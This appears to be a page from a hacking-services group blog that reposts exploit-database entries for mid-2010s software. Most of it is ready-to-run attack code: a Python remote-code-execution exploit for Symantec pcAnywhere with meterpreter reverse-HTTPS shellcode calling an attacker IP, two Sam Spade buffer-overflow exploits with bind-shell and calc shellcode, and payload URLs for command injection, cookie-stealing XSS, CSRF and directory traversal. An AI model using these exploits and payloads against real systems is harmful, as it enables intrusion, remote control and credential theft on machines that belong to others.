Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863294403

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 

actiTIME 2015.2 Multiple Vulnerabilities


Vendor: Actimind, Inc.
Product web page: http://www.actitime.com
Affected version: 2015.2 (Small Team Edition)

Summary: actiTIME is a web timesheet software. It allows you to
enter time spent on different work assignments, register time offs
and sick leaves, and then create detailed reports covering almost
any management or accounting needs.

Desc: The application suffers from multiple security vulnerabilities
including: Open Redirection, HTTP Response Splitting and Unquoted
Service Path Elevation Of Privilege.

Tested on: OS/Platform:	Windows 7 6.1 for x86
           Servlet Container: Jetty/5.1.4
           Servlet API Version: 2.4
           Java: 1.7.0_76-b13
           Database: MySQL 5.1.72-community-log
           Driver: MySQL-AB JDBC Driver mysql-connector-java-5.1.13
           Patch level: 28.0


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience


Advisory ID: ZSL-2015-5273
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5273.php


13.10.2015

--



1. Open Redirect
-----------------

http://localhost/administration/settings.do?redirectUrl=http://zeroscience.mk&submitted=1


2. HTTP Response Splitting
---------------------------

http://localhost/administration/settings.do?redirectUrl=%0a%0dServer%3a%20Waddup%2f2%2e0&submitted=1

Response:

HTTP/1.1 302 Moved Temporarily
Date: Wed, 14 Oct 2015 09:32:05 GMT
Server: Jetty/5.1.4 (Windows 7/6.1 x86 java/1.7.0_76
Content-Type: text/html;charset=UTF-8
Cache-Control: no-store, no-cache
Pragma: no-cache
Expires: Tue, 09 Sep 2014 09:32:05 GMT
X-UA-Compatible: IE=Edge
Location: http://localhost/administration/
Server: Waddup/2.0
Content-Length: 0


3. Unquoted Service Path Elevation Of Privilege
------------------------------------------------

C:\Users\joxy>sc qc actiTIME
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: actiTIME
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\actiTIME\actitime_access.exe startAsService
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : actiTIME Server
        DEPENDENCIES       : actiTIME MySQL
        SERVICE_START_NAME : LocalSystem
HireHackking 
#!/usr/bin/python

################################################################
# Exploit Title: Symantec pcAnywhere v12.5.0 Windows x86 RCE
# Date: 2015-10-31
# Exploit Author: Tomislav Paskalev
# Vendor Homepage: https://www.symantec.com/
# Software Link: http://esdownload.symantec.com/akdlm/CD/MTV/pcAnywhere_12_5_MarketingTrialware.exe
#   Version: Symantec pcAnywhere v12.5.0 Build 442 (Trial)
# Vulnerable Software:
#   Symantec pcAnywhere 12.5.x through 12.5.3
#   Symantec IT Management Suite pcAnywhere Solution 7.0 (aka 12.5.x) and 7.1 (aka 12.6.x)
# Tested on:
#   Symantec pcAnywhere v12.5.0 Build 442 (Trial)
#   --------------------------------------------
#   Microsoft Windows Vista Ultimate SP1 x86 EN
#   Microsoft Windows Vista Ultimate SP2 x86 EN
#   Microsoft Windows 2008 Enterprise SP2 x86 EN
#   Microsoft Windows 7 Professional SP1 x86 EN
#   Microsoft Windows 7 Ultimate SP1 x86 EN
# CVE ID: 2011-3478
# OSVDB-ID: 78532
################################################################
# Vulnerability description:
#   The application's module used for handling incoming connections
#   (awhost32.exe) contains a flaw. When handling authentication
#   requests, the vulnerable process copies user provided input
#   to a fixed length buffer without performing a length check.
#   A remote unauthenticated attacker can exploit this vulnerability
#   to cause a buffer overflow and execute arbitrary code in the
#   context of the exploited application (installed as a service
#   by default, i.e. with "NT AUTHORITY\SYSTEM" privileges).
################################################################
# Target application notes:
#   - the application processes one login attempt at a time
#     (i.e. multiple parallel login requests are not possible)
#   - available modules (interesting exploit wise):
#     Name         | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll
#    -------------------------------------------------------------
#     awhost32.exe | False  | False   | False |  False   | False
#     ijl20.dll    | False  | False   | False |  False   | False
#     IMPLODE.DLL  | False  | False   | False |  False   | False
#    -------------------------------------------------------------
#   - supported Windows x86 operating systems (pcAnywhere v12.5)
#       - Windows 2000
#       - Windows 2003 Server
#       - Windows 2008 Server
#       - Windows XP
#       - Windows Vista
#       - Windows 7
################################################################
# Exploit notes:
#   - bad characters: "\x00"
#   - Windows Vista, Windows 2008 Server, Windows 7
#     - after a shellcode execution event occurs, the
#       application does not crash and remains fully functional
#       - one successful shellcode execution event has a low
#         success rate (applies to all OSes)
#         - in order to achieve an overall more reliable exploit,
#           multiple shellcode executions need to be performed
#           (until the shellcode is successfully executed)
#           - brute force is a feasible method 
#             - multiple parallel brute force attacks are not possible
#   - multiple valid offsets are available (i.e. not just the
#     ones tested)
################################################################
# Test notes:
#   - all tested OSes
#     - clean default installations
#   - all OS specific statistics referenced in the exploit are
#     based on the test results of 10 attempts per tested offset
#     - all attempts were performed after a system reboot (VM)
#     - the provided test results should be taken only as a rough guide
#       - in practice it might occur that the number of attempts
#         needed to achieve successful exploitation is (much)
#         higher than the maximum value contained in the test
#         results, or that the exploit does not succeed at all
#         - other (untested) offsets might provide better results
#   - not letting the OS and application load fully/properly before
#     starting the exploit may lead to failed exploitation (this
#     observation was made during the testing of the exploit and
#     applies mostly to Windows 7)
################################################################
# Patch:
#   https://support.symantec.com/en_US/article.TECH179526.html
#   https://support.norton.com/sp/en/us/home/current/solutions/v78694006_EndUserProfile_en_us
################################################################
# Thanks to:
#   Tal zeltzer (discovered the vulnerability)
#   S2 Crew (Python PoC)
################################################################
# In memoriam:
#   msfpayload | msfencode  [2005 - 2015]
################################################################
# References:
#   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3478
#   http://www.zerodayinitiative.com/advisories/ZDI-12-018/
#   https://www.exploit-db.com/exploits/19407/
################################################################


import socket
import time
import struct
import string
import sys




################################
###  HARDCODED TARGET INFO   ###
################################


# target server info
# >>> MODIFY THIS >>>
targetServer = "192.168.80.227"
targetPort   = 5631


# Supported operating systems
vistaUltSP1  = {
    'Version': 'Microsoft Windows Vista Ultimate SP1 x86 EN',
    'Offset': 0x03e60000,
    'PasswordStringLength': 3500,
    'TestAttempts': [8, 62, 35, 13, 8, 7, 11, 23, 8, 10]
};
vistaUltSP2  = {
    'Version': 'Microsoft Windows Vista Ultimate SP2 x86 EN',
    'Offset': 0x03e60000,
    'PasswordStringLength': 3500,
    'TestAttempts': [16, 27, 13, 17, 4, 13, 7, 9, 5, 16]
};
s2k8EntSP2   = {
    'Version': 'Microsoft Windows 2008 Enterprise SP2 x86 EN',
    'Offset': 0x03dd0000,
    'PasswordStringLength': 3500,
    'TestAttempts': [25, 5, 14, 18, 66, 7, 8, 4, 4, 24]
};
sevenProSP1  = {
    'Version': 'Microsoft Windows 7 Professional SP1 x86 EN',
    'Offset': 0x03a70000,
    'PasswordStringLength': 3500,
    'TestAttempts': [188, 65, 25, 191, 268, 61, 127, 136, 18, 98]
};
sevenUltSP1  = {
    'Version': 'Microsoft Windows 7 Ultimate SP1 x86 EN',
    'Offset': 0x03fa0000,
    'PasswordStringLength': 3500,
    'TestAttempts': [23, 49, 98, 28, 4, 31, 4, 42, 50, 42]
};


# target server OS
# >>> MODIFY THIS >>>
#OSdictionary = vistaUltSP1
#OSdictionary = vistaUltSP2
#OSdictionary = s2k8EntSP2
#OSdictionary = sevenProSP1
OSdictionary = sevenUltSP1


# timeout values
shellcodeExecutionTimeout = 30


# client-server handshake
initialisationSequence = "\x00\x00\x00\x00"
handshakeSequence      = "\x0d\x06\xfe"


# username string
usernameString         = "U" * 175


# shellcode
# available shellcode space: 1289 bytes
# shellcode generated with Metasploit Framework Version: 4.11.4-2015090201 (Kali 2.0)
# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_https LHOST=192.168.80.223 LPORT=443 EXITFUNC=seh -e x86/shikata_ga_nai -b '\x00' -f python -v shellcode
# >>> MODIFY THIS >>>
shellcode =  ""
shellcode += "\xda\xd3\xd9\x74\x24\xf4\xbf\x2c\x46\x39\x97\x5d"
shellcode += "\x33\xc9\xb1\x87\x83\xed\xfc\x31\x7d\x14\x03\x7d"
shellcode += "\x38\xa4\xcc\x6b\xa8\xaa\x2f\x94\x28\xcb\xa6\x71"
shellcode += "\x19\xcb\xdd\xf2\x09\xfb\x96\x57\xa5\x70\xfa\x43"
shellcode += "\x3e\xf4\xd3\x64\xf7\xb3\x05\x4a\x08\xef\x76\xcd"
shellcode += "\x8a\xf2\xaa\x2d\xb3\x3c\xbf\x2c\xf4\x21\x32\x7c"
shellcode += "\xad\x2e\xe1\x91\xda\x7b\x3a\x19\x90\x6a\x3a\xfe"
shellcode += "\x60\x8c\x6b\x51\xfb\xd7\xab\x53\x28\x6c\xe2\x4b"
shellcode += "\x2d\x49\xbc\xe0\x85\x25\x3f\x21\xd4\xc6\xec\x0c"
shellcode += "\xd9\x34\xec\x49\xdd\xa6\x9b\xa3\x1e\x5a\x9c\x77"
shellcode += "\x5d\x80\x29\x6c\xc5\x43\x89\x48\xf4\x80\x4c\x1a"
shellcode += "\xfa\x6d\x1a\x44\x1e\x73\xcf\xfe\x1a\xf8\xee\xd0"
shellcode += "\xab\xba\xd4\xf4\xf0\x19\x74\xac\x5c\xcf\x89\xae"
shellcode += "\x3f\xb0\x2f\xa4\xad\xa5\x5d\xe7\xb9\x57\x3b\x6c"
shellcode += "\x39\xc0\xb4\xe5\x57\x79\x6f\x9e\xeb\x0e\xa9\x59"
shellcode += "\x0c\x25\x84\xbe\xa1\x95\xb4\x13\x16\x72\x01\xc2"
shellcode += "\xe1\x25\x8a\x3f\x42\x79\x1f\xc3\x37\x2e\xb7\x78"
shellcode += "\xb6\xd0\x47\x97\x86\xd1\x47\x67\xd9\x84\x3f\x54"
shellcode += "\x6e\x11\x95\xaa\x3a\x37\x6f\xa8\xf7\xbe\xf8\x1d"
shellcode += "\x4c\x16\x73\x50\x25\xc2\x0c\xa6\x91\xc1\xb0\x8b"
shellcode += "\x53\x69\x76\x22\xd9\x46\x0a\x1a\xbc\xea\x87\xf9"
shellcode += "\x09\xb2\x10\xcf\x14\x3c\xd0\x56\xb3\xc8\xba\xe0"
shellcode += "\x69\x5a\x3a\xa2\xff\xf0\xf2\x73\x92\x4b\x79\x10"
shellcode += "\x02\x3f\x4f\xdc\x8f\xdb\xe7\x4f\x6d\x1d\xa9\x1d"
shellcode += "\x42\x0c\x70\x80\xcc\xe9\xe5\x0a\x55\x80\x8a\xc2"
shellcode += "\x3d\x2a\x2f\xa5\xe2\xf1\xfe\x7d\x2a\x86\x6b\x08"
shellcode += "\x27\x33\x2a\xbb\xbf\xf9\xd9\x7a\x7d\x87\x4f\x10"
shellcode += "\xed\x0d\x1b\xad\x88\xc6\xb8\x50\x07\x6a\x74\xf1"
shellcode += "\xd3\x2d\xd9\x84\x4e\xc0\x8e\x25\x23\x76\x60\xc9"
shellcode += "\xb4\xd9\xf5\x64\x0e\x8e\xa6\x22\x05\x39\x3f\x98"
shellcode += "\x96\x8e\xca\x4f\x79\x54\x64\x26\x33\x3d\xe7\xaa"
shellcode += "\xa2\xb1\x90\x59\x4b\x74\x1a\xce\xf9\x0a\xc6\xd8"
shellcode += "\xcc\x99\x49\x75\x47\x33\x0e\x1c\xd5\xf9\xde\xad"
shellcode += "\xa3\x8c\x1e\x02\x3b\x38\x96\x3d\x7d\x39\x7d\xc8"
shellcode += "\x47\x95\x16\xcb\x75\xfa\x63\x98\x2a\xa9\x3c\x4c"
shellcode += "\x9a\x25\x28\x27\x0c\x8d\x51\x1d\xc6\x9b\xa7\xc1"
shellcode += "\x8e\xdb\x8b\xfd\x4e\x55\x0b\x97\x4a\x35\xa6\x77"
shellcode += "\x04\xdd\x43\xce\x36\x9b\x53\x1b\x15\xf7\xf8\xf7"
shellcode += "\xcf\x9f\xd3\xf1\xf7\x24\xd3\x2b\x82\x1b\x5e\xdc"
shellcode += "\xc3\xee\x78\x34\x90\x10\x7b\xc5\x4c\x51\x13\xc5"
shellcode += "\x80\x51\xe3\xad\xa0\x51\xa3\x2d\xf3\x39\x7b\x8a"
shellcode += "\xa0\x5c\x84\x07\xd5\xcc\x28\x21\x3e\xa5\xa6\x31"
shellcode += "\xe0\x4a\x37\x61\xb6\x22\x25\x13\xbf\x51\xb6\xce"
shellcode += "\x3a\x55\x3d\x3e\xcf\x51\xbf\x03\x4a\x9d\xca\x66"
shellcode += "\x0c\xdd\x6a\x81\xdb\x1e\x6b\xae\x12\xd8\xa6\x7f"
shellcode += "\x65\x2c\xff\x51\xbd\x60\xd1\x9f\x8f\xb3\x2d\x5b"
shellcode += "\x11\xbd\x1f\x71\x87\xc2\x0c\x7a\x82\xa9\xb2\x47"




################################
###     BUFFER OVERFLOW      ###
###   STRING CONSTRUCTION    ###
################################


# Calculate address values based on the OS offset
pointerLocationAddress    = OSdictionary['Offset'] + 0x00005ad8
pointerForECXplus8Address = OSdictionary['Offset'] + 0x00005ad4
breakPointAddress         = OSdictionary['Offset'] + 0x000065af - 0x00010000


# jump over the next 38 bytes (to the begining of the shellcode)
jumpToShellcode    = "\xeb\x26\x90\x90"

# pointerLocationAddress - the memory address location of the "pointerForECXplus8" variable
pointerLocation    = struct.pack('<L', pointerLocationAddress)

# CALL ESI from the application module ijl20.dll [aslr=false,rebase=false,safeseh=false]
callESI            = struct.pack('<L', 0x67f7ab23)

# pointerForECXplus8Address - the memory address location of the start of the DDDD string in the shellcode (Offset + 0x00005acc + 0x8)
pointerForECXplus8 = struct.pack('<L', pointerForECXplus8Address)


# construct the password string which will cause a buffer overflow condition and exploit the vulnerability
passwordString = (
    "A" * 945 +
    jumpToShellcode +
    pointerLocation +
    "D" * 4 +
    pointerForECXplus8 +
    callESI +
    "\x90" * 20 +
    shellcode +
    "I" * (1289 - len(shellcode)) +
    "\xaa" * (OSdictionary['PasswordStringLength'] - 945 - 4 * 5 - 20 - 1289)
)




################################
###        FUNCTIONS         ###
################################


# calculate and return the median value of the argument list
def calculateMedian(targetList):
    sortedTargetList = sorted(targetList)
    targetListLength = len(targetList)
    medianIndex = (targetListLength - 1) / 2

    if (targetListLength % 2):
        return sortedTargetList[medianIndex]
    else:
        return ((sortedTargetList[medianIndex] + sortedTargetList[medianIndex + 1]) / 2)



# print an indented line with a type prefix
def printLine(infoType, indentDepth, textToDisplay):

    # [I]nformational
    if infoType == "I":
        print ('    ' * indentDepth),
        print "\033[1;37m[*]\033[1;m", textToDisplay

    # [E]rror
    elif infoType == "E":
        print ('    ' * indentDepth),
        print "\033[1;31m[-]\033[1;m", textToDisplay

    # [S]uccess
    elif infoType == "S":
        print ('    ' * indentDepth),
        print "\033[1;32m[+]\033[1;m", textToDisplay

    # [W]arning
    elif infoType == "W":
        print ('    ' * indentDepth),
        print "\033[1;33m[!]\033[1;m", textToDisplay

    # [N]one
    elif infoType == "N":
        print ('    ' * indentDepth),
        print textToDisplay



# print the banner - general exploit info, target info, target OS statistics
def printBanner():
    printLine ("I", 0, "Symantec pcAnywhere v12.5.0 Build 442 Login+Password field")
    printLine ("N", 1, "Buffer Overflow Remote Code Execution exploit (CVE-2011-3478)")
    printLine ("I", 1, "by Tomislav Paskalev")

    printLine ("I", 0, "Target server information")
    printLine ("I", 1, "IP address            : " + targetServer)
    printLine ("I", 1, "Port                  : " + str(targetPort))

    printLine ("I", 0, "Exploit target information")
    printLine ("I", 1, "Target OS             : " + OSdictionary['Version'])
    printLine ("I", 2, "Offset            : " + "{:#010x}".format(OSdictionary['Offset']))
    printLine ("I", 2, "Breakpoint (test) : " + "{:#010x}".format(breakPointAddress))
    printLine ("I", 2, "Password length   : " + str(OSdictionary['PasswordStringLength']))
    printLine ("I", 2, "Test result stats")
    printLine ("I", 3, "Test count    : " + str(len(OSdictionary['TestAttempts'])))
    printLine ("I", 3, "Reliability   : " + str(((len(OSdictionary['TestAttempts']) - OSdictionary['TestAttempts'].count(0)) * 100) / len(OSdictionary['TestAttempts'])) + "%")
    printLine ("I", 3, "Min attempt   : " + str(min([element for element in OSdictionary['TestAttempts'] if element > 0])))
    printLine ("I", 3, "Max attempt   : " + str(max(OSdictionary['TestAttempts'])))
    printLine ("I", 3, "Avg attempt   : " + str(sum(OSdictionary['TestAttempts']) / len(OSdictionary['TestAttempts'])))
    printLine ("I", 3, "Median attempt: " + str(calculateMedian(OSdictionary['TestAttempts'])))



# connect to the server and return the socket
def connectToServer(server, port):
    # create socket
    targetSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        targetSocket.connect((server, port))
    except socket.error as msg:
        if "[Errno 111] Connection refused" in str(msg):
            return None
    # return the opened socket
    return targetSocket



# send the data to the server and return the response
def sendDataToServer(destSocket, dataToSend):
    destSocket.send(dataToSend)
    try:
        receivedData = destSocket.recv(1024)
    except socket.error as msg:
        if "[Errno 104] Connection reset by peer" in str(msg):
            return None
    return receivedData



# run the exploit; exits when finished or interrupted
def runExploit():
    printLine ("I", 0, "Starting exploit...")

    attemptCounter = 0

    # brute force the service until the shellcode is successfully executed
    while True:
        # connect to the target server
        openSocket = connectToServer(targetServer, targetPort)

        attemptCounter += 1
        sleepTimer = 0

        printLine ("I", 1, "Attempt no. " + str(attemptCounter))
        printLine ("I", 2, "Sending initialisation sequence...")

        # send the data; check outcome
        while True:
            receivedData = sendDataToServer(openSocket, initialisationSequence)
            # check if server responded properly, if yes exit the loop
            if receivedData:
                if "Please press <Enter>..." in receivedData:
                    break
            # exit if the service is unavailable
            if attemptCounter == 1:
                printLine ("E", 3, "Service unavailable")
                printLine ("I", 4, "Exiting...")
                exit(1)
            # check if shellcode executed (based on a timer)
            if sleepTimer > shellcodeExecutionTimeout:
                print ""
                printLine ("S", 4, "Shellcode executed after " + str(attemptCounter - 1) + " attempts")
                printLine ("I", 5, "Exiting...")
                exit(1)

            # print waiting ticks
            sys.stdout.write('\r')
            sys.stdout.write("             \033[1;33m[!]\033[1;m Connection reset - reinitialising%s" % ('.' * sleepTimer))
            sys.stdout.flush()

            # sleep one second and reconnect
            time.sleep(1)
            sleepTimer += 1

            openSocket.close()
            openSocket = connectToServer(targetServer, targetPort)

        if sleepTimer > 0:
            print ""

        printLine ("I", 2, "Sending handshake sequence...")
        openSocket.send(handshakeSequence)
        time.sleep(3)
        data = openSocket.recv(1024)
 
        printLine ("I", 2, "Sending username...")
        openSocket.send(usernameString)
        time.sleep(3)
 
        printLine ("I", 2, "Sending password...")
        openSocket.send(passwordString)
        openSocket.close()
        time.sleep(3)



# main function
if __name__ == "__main__":
    printBanner()
    try:
        runExploit()
    except KeyboardInterrupt:
        print ""
        sys.exit()


# End of file
HireHackking 
#!/usr/bin/python 
# -*- coding: cp1252 -*-
# EXPLOIT TITLE: Sam Spade 1.14 Scan from IP address Field Exploit
# AUTHOR: VIKRAMADITYA "-OPTIMUS"
# Credits: Luis Mart�nez
# Date of Testing: 2nd November 2015
# Download Link : https://www.exploit-db.com/apps/7ad7569341d685b4760ba4adecab6def-spade114.exe
# Tested On : Windows XP Service Pack 2
# Steps to Exploit
# Step 1: Execute this python script
# Step 2: This script will create a file called buffer.txt
# Step 3: Copy the contents of buffer.txt file
# Step 4: Now open Sam Spade 1.14 
# Step 5: Go To 'Tools' > 'Scan Addresses...' 
# Step 6: Paste the contents in 'Scan from IP addresses' input field 
# Step 7: Connect to the target at port 4444 with ncat/nc 




file = open('buffer.txt' , 'wb');

buffer = "A"*507 + "\x9f\x43\x30\x5d"  #JMP ESP 
buffer += "\x90"*20

# msfvenom  -p windows/shell_bind_tcp -f c -b "\x00\x0a\x0d\x20\x0b\x0c"

buffer += ("\xba\x72\x30\xbb\xe7\xdd\xc1\xd9\x74\x24\xf4\x58\x31\xc9\xb1"
"\x53\x31\x50\x12\x83\xc0\x04\x03\x22\x3e\x59\x12\x3e\xd6\x1f"
"\xdd\xbe\x27\x40\x57\x5b\x16\x40\x03\x28\x09\x70\x47\x7c\xa6"
"\xfb\x05\x94\x3d\x89\x81\x9b\xf6\x24\xf4\x92\x07\x14\xc4\xb5"
"\x8b\x67\x19\x15\xb5\xa7\x6c\x54\xf2\xda\x9d\x04\xab\x91\x30"
"\xb8\xd8\xec\x88\x33\x92\xe1\x88\xa0\x63\x03\xb8\x77\xff\x5a"
"\x1a\x76\x2c\xd7\x13\x60\x31\xd2\xea\x1b\x81\xa8\xec\xcd\xdb"
"\x51\x42\x30\xd4\xa3\x9a\x75\xd3\x5b\xe9\x8f\x27\xe1\xea\x54"
"\x55\x3d\x7e\x4e\xfd\xb6\xd8\xaa\xff\x1b\xbe\x39\xf3\xd0\xb4"
"\x65\x10\xe6\x19\x1e\x2c\x63\x9c\xf0\xa4\x37\xbb\xd4\xed\xec"
"\xa2\x4d\x48\x42\xda\x8d\x33\x3b\x7e\xc6\xde\x28\xf3\x85\xb6"
"\x9d\x3e\x35\x47\x8a\x49\x46\x75\x15\xe2\xc0\x35\xde\x2c\x17"
"\x39\xf5\x89\x87\xc4\xf6\xe9\x8e\x02\xa2\xb9\xb8\xa3\xcb\x51"
"\x38\x4b\x1e\xcf\x30\xea\xf1\xf2\xbd\x4c\xa2\xb2\x6d\x25\xa8"
"\x3c\x52\x55\xd3\x96\xfb\xfe\x2e\x19\x12\xa3\xa7\xff\x7e\x4b"
"\xee\xa8\x16\xa9\xd5\x60\x81\xd2\x3f\xd9\x25\x9a\x29\xde\x4a"
"\x1b\x7c\x48\xdc\x90\x93\x4c\xfd\xa6\xb9\xe4\x6a\x30\x37\x65"
"\xd9\xa0\x48\xac\x89\x41\xda\x2b\x49\x0f\xc7\xe3\x1e\x58\x39"
"\xfa\xca\x74\x60\x54\xe8\x84\xf4\x9f\xa8\x52\xc5\x1e\x31\x16"
"\x71\x05\x21\xee\x7a\x01\x15\xbe\x2c\xdf\xc3\x78\x87\x91\xbd"
"\xd2\x74\x78\x29\xa2\xb6\xbb\x2f\xab\x92\x4d\xcf\x1a\x4b\x08"
"\xf0\x93\x1b\x9c\x89\xc9\xbb\x63\x40\x4a\xcb\x29\xc8\xfb\x44"
"\xf4\x99\xb9\x08\x07\x74\xfd\x34\x84\x7c\x7e\xc3\x94\xf5\x7b"
"\x8f\x12\xe6\xf1\x80\xf6\x08\xa5\xa1\xd2")



file.write(buffer);
file.close()
HireHackking 
# Exploit Title     : Sam Spade 1.14 - Buffer OverFlow
# Date              : 10/30/2015
# Exploit Author    : MandawCoder
# Contact           : MandawCoder@gmail.com
# Vendor Homepage   : http://samspade.org
# Software Link     : http://www.majorgeeks.com/files/details/sam_spade.html
# Version           : 1.14
# Tested on         : XP Professional SP3 En x86
# Category          : Local Exploit
# Description:
# bug is on this section == Tools -> Crawl website...
# Execute following exploit, then delete "http://" from "CRAWL all URLs below" part, then paste the content of file.txt into mentioned section.
#
# this section(and other sections as well) also has SEH buffer overflow ... I would really appreciated if someone Exploit it.


f = open("file.txt", "w")

Junk = "A"*503

addr = "\x53\x93\x42\x7E"

space = "AAAA"

nop="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

# Shellcode:
# windows/exec - 277 bytes
# CMD=calc.exe
shellcode= ("\xba\x1c\xb4\xa5\xac\xda\xda\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
"\x33\x31\x53\x12\x83\xeb\xfc\x03\x4f\xba\x47\x59\x93\x2a\x0e"
"\xa2\x6b\xab\x71\x2a\x8e\x9a\xa3\x48\xdb\x8f\x73\x1a\x89\x23"
"\xff\x4e\x39\xb7\x8d\x46\x4e\x70\x3b\xb1\x61\x81\x8d\x7d\x2d"
"\x41\x8f\x01\x2f\x96\x6f\x3b\xe0\xeb\x6e\x7c\x1c\x03\x22\xd5"
"\x6b\xb6\xd3\x52\x29\x0b\xd5\xb4\x26\x33\xad\xb1\xf8\xc0\x07"
"\xbb\x28\x78\x13\xf3\xd0\xf2\x7b\x24\xe1\xd7\x9f\x18\xa8\x5c"
"\x6b\xea\x2b\xb5\xa5\x13\x1a\xf9\x6a\x2a\x93\xf4\x73\x6a\x13"
"\xe7\x01\x80\x60\x9a\x11\x53\x1b\x40\x97\x46\xbb\x03\x0f\xa3"
"\x3a\xc7\xd6\x20\x30\xac\x9d\x6f\x54\x33\x71\x04\x60\xb8\x74"
"\xcb\xe1\xfa\x52\xcf\xaa\x59\xfa\x56\x16\x0f\x03\x88\xfe\xf0"
"\xa1\xc2\xec\xe5\xd0\x88\x7a\xfb\x51\xb7\xc3\xfb\x69\xb8\x63"
"\x94\x58\x33\xec\xe3\x64\x96\x49\x1b\x2f\xbb\xfb\xb4\xf6\x29"
"\xbe\xd8\x08\x84\xfc\xe4\x8a\x2d\x7c\x13\x92\x47\x79\x5f\x14"
"\xbb\xf3\xf0\xf1\xbb\xa0\xf1\xd3\xdf\x27\x62\xbf\x31\xc2\x02"
 "\x5a\x4e")

f.write(Junk + addr + space + nop + shellcode)

f.close()

print "Done"
HireHackking 
source: https://www.securityfocus.com/bid/60826/info

ZamFoo is prone to a remote command-injection vulnerability.

Attackers can exploit this issue to execute arbitrary commands in the context of the application.

ZamFoo 12.0 is vulnerable; other versions may also be affected. 

http://www.example.com/cgi/zamfoo/zamfoo_do_restore_zamfoo_backup.cgi?accounttorestore=account&date=`command`
HireHackking 
source: https://www.securityfocus.com/bid/60795/info

Xaraya is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Xaraya 2.4.0-b1 is vulnerable; other versions may also be affected. 

http://www.example.com/index.php?func=modinfonew&id=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E&module=modules&type=admin

http://www.example.com/index.php?block_id=7&func=modify_instance&interface=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E&module=blocks&tab=config&type=admin

http://www.example.com/index.php?func=aliases&module=modules&name=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E&type=admin

http://www.example.com/index.php?func=assignprivileges&module=privileges&tab=authsystem&tabmodule=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3
HireHackking 
source: https://www.securityfocus.com/bid/60818/info

Motion is prone to multiple security vulnerabilities including multiple buffer-overflow vulnerabilities, a cross-site scripting vulnerability and a cross-site request-forgery vulnerability.

An attacker may exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, execute arbitrary code, and cause denial-of-service conditions. Other attacks may also be possible.

Motion 3.2.12 is vulnerable; other versions may also be affected. 

Buffer-overflow:

# motion -c `python -c 'print "\x41"*1000'`
[0] Configfile
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAA
not fou:
Segmentation fault


# motion -p /tmp/`python -c 'print "\x41"*5000'`
Segmentation fault

Cross-site scripting:

http://www.example.com
<IP>:<PORT>/0/config/set?process_id_file=</li><script>alert('XSS');</script><li>

Cross-site request forgery:

http://www.example.com/0/config/set?control_authentication=admin:mypassword
(Set admin password)
http://www.example.com/0/config/set?sql_query=SELECT%20user() (Arbitrary 
SQL
query)
HireHackking 
source: https://www.securityfocus.com/bid/60782/info

Barnraiser Prairie is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.

Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to access arbitrary images in the context of the application. This may aid in further attacks. 

http://www.example.com/get_file.php?avatar=..&width=../../../../../../../../usr/share/apache2/icons/apache_pb.png
HireHackking 
source: https://www.securityfocus.com/bid/60760/info

